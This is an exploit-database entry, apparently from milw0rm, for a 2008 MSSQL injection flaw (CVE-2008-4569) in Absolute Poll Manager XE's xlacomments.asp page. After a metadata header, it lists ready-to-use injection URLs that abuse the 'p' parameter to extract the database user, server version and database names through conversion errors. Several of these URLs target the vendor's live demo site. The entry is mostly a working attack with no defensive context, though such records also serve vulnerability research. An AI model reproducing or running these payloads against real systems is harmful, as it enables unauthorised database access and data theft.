Absolute Poll Manager XE 4.1 - 'xlacomments.asp' SQL Injection

Author: Hakxer
type: webapps
platform: asp
port: 
date_added: 2008-10-10 
date_updated:  
verified: 1 
codes: OSVDB-49150;CVE-2008-4569 
tags: 
aliases:  
screenshot_url:  
application_url: 

###############################################################################################
# Author : Hakxer
# Home : Www.educ-up.com
# Type Gap : Sql injection --((MSSQL Injection))--
# script : Absolute Poll Manager XE  [see script] http://www.xigla.com/absolutepm/demo.htm
# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r , Stealth , Kof2002
# TM : EgY Coders
#################################################################################################

### POC
www.site.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))

### Exploit :

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+@@version))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(1)))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(2)))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(3)))

###############################################################################

-------------------------------- The End of Gap -----------------------------------

# milw0rm.com [2008-10-11]